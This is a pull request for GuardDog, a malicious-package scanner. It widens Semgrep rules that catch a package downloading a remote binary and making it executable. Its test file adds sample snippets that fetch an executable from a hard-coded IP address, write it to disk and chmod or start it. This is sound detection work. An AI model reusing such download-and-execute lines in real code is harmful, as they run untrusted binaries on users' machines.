### PR TITLE
Add new heuristics for the download-executable module

### DIFF
--- a/guarddog/analyzer/sourcecode/download-executable.yml
+++ b/guarddog/analyzer/sourcecode/download-executable.yml
@@ -13,27 +13,39 @@ rules:
               ...
               $FILE.write($REQUEST)
           - pattern: open(...).write($REQUEST)
+          - pattern: |
+              with open(...) as $FILE:
+                ...
+                $FILE.write($REQUEST)
       - patterns:
           - pattern-either:
               - pattern: |
-                  $FILE = open("$LOC", ...)
+                  $FILE = open($LOC, ...)
                   ...
                   $FILE.write($REQUEST)
                   ...
                   $CHANGE_PERMISSIONS
               - pattern: |
-                  with open("$LOC", ...) as $FILE:
+                  with open($LOC, ...) as $FILE:
                     ...
                     $FILE.write($REQUEST)
+                  ...
+                  $CHANGE_PERMISSIONS
+              - pattern: |
+                  open(...).write($REQUEST)
                   ...
                   $CHANGE_PERMISSIONS
           - metavariable-pattern:
               metavariable: $CHANGE_PERMISSIONS
               pattern-either:
                 - pattern: os.chmod("$LOC", 777)
+                - pattern: os.chmod($LOC, 777)
                 - pattern: os.chmod("$LOC", <...stat.S_IEXEC...>)
+                - pattern: os.chmod($LOC, <...stat.S_IEXEC...>)
                 - pattern: chmod("$LOC", 777)
+                - pattern: chmod($LOC, 777)
                 - pattern: chmod("$LOC", <...stat.S_IEXEC...>)
+                - pattern: chmod($LOC, <...stat.S_IEXEC...>)
     pattern-sources:
       - pattern: (...).send(...)
       - pattern: send(...)

--- a/guarddog/analyzer/sourcecode/download-executable.yml
+++ b/guarddog/analyzer/sourcecode/download-executable.yml
@@ -7,16 +7,6 @@ rules:
       description: Identify when a package downloads and makes executable a remote binary
     mode: taint
     pattern-sinks:
-      - pattern-either:
-          - pattern: |
-              $FILE = open(...)
-              ...
-              $FILE.write($REQUEST)
-          - pattern: open(...).write($REQUEST)
-          - pattern: |
-              with open(...) as $FILE:
-                ...
-                $FILE.write($REQUEST)
       - patterns:
           - pattern-either:
               - pattern: |
@@ -32,7 +22,7 @@ rules:
                   ...
                   $CHANGE_PERMISSIONS
               - pattern: |
-                  open(...).write($REQUEST)
+                  open($LOC, ...).write($REQUEST)
                   ...
                   $CHANGE_PERMISSIONS
           - metavariable-pattern:
@@ -46,6 +36,7 @@ rules:
                 - pattern: chmod($LOC, 777)
                 - pattern: chmod("$LOC", <...stat.S_IEXEC...>)
                 - pattern: chmod($LOC, <...stat.S_IEXEC...>)
+                - pattern: os.system(f"...{$LOC}...")
     pattern-sources:
       - pattern: (...).send(...)
       - pattern: send(...)

--- a/guarddog/analyzer/sourcecode/download-executable.yml
+++ b/guarddog/analyzer/sourcecode/download-executable.yml
@@ -7,6 +7,12 @@ rules:
       description: Identify when a package downloads and makes executable a remote binary
     mode: taint
     pattern-sinks:
+      - pattern-either:
+          - pattern: |
+              $FILE = open(...)
+              ...
+              $FILE.write($REQUEST)
+          - pattern: open(...).write($REQUEST)
       - patterns:
           - pattern-either:
               - pattern: |
@@ -37,4 +43,5 @@ rules:
       - pattern: urlopen(...)
       - pattern: (...).getresponse(...)
       - pattern: getresponse(...)
+      - pattern: requests.$FUNC(...)
     severity: WARNING

--- a/tests/analyzer/sourcecode/download-executable.py
+++ b/tests/analyzer/sourcecode/download-executable.py
@@ -56,18 +56,18 @@ req = requests.get(url)
 with open(executable, 'wb') as f:
     f.write(req.content)
 if 'linux' in operating_system or 'darwin' in operating_system:
-    os.system(f'chmod +x {executable}')
-
+    os.system(f"chmod +x {executable}")
 
 """ RULEID: Simple download + file creation
 """
 response = requests.get(URL)
 # ruleid: download-executable
-open("exo.exe", "wb").write(response.content)
+open(executable1, "wb").write(response.content)
+os.system(f"chmod +x {executable1}")
 
 response = requests.get(URL)
 # ruleid: download-executable
-fle = open("exo.exe", "wb")
-fle.write(response.content)
+open(executable2, "wb").write(response.content)
+os.system(f'set __COMPACT_LAYER=RunAsInvoker | start +x {executable2}')
 
 

--- a/tests/analyzer/sourcecode/download-executable.py
+++ b/tests/analyzer/sourcecode/download-executable.py
@@ -47,3 +47,27 @@ if condiment and condiment != "0.0.0.0":
         colmar.write(narcohypnosis)
     os.chmod("/tmp/reloan", 777)
     subprocess.call("/tmp/reloan")
+
+""" RULEID: Detect requests
+"""
+url = 'http://35.235.126.33/executable.exe'
+req = requests.get(url)
+# ruleid: download-executable
+with open(executable, 'wb') as f:
+    f.write(req.content)
+if 'linux' in operating_system or 'darwin' in operating_system:
+    os.system(f'chmod +x {executable}')
+
+
+""" RULEID: Simple download + file creation
+"""
+response = requests.get(URL)
+# ruleid: download-executable
+open("exo.exe", "wb").write(response.content)
+
+response = requests.get(URL)
+# ruleid: download-executable
+fle = open("exo.exe", "wb")
+fle.write(response.content)
+
+


### PR DESCRIPTION
Download-executable:
- Detect when the requests library is used (issue #111)

Next step:
- Detecting execution after creating a new file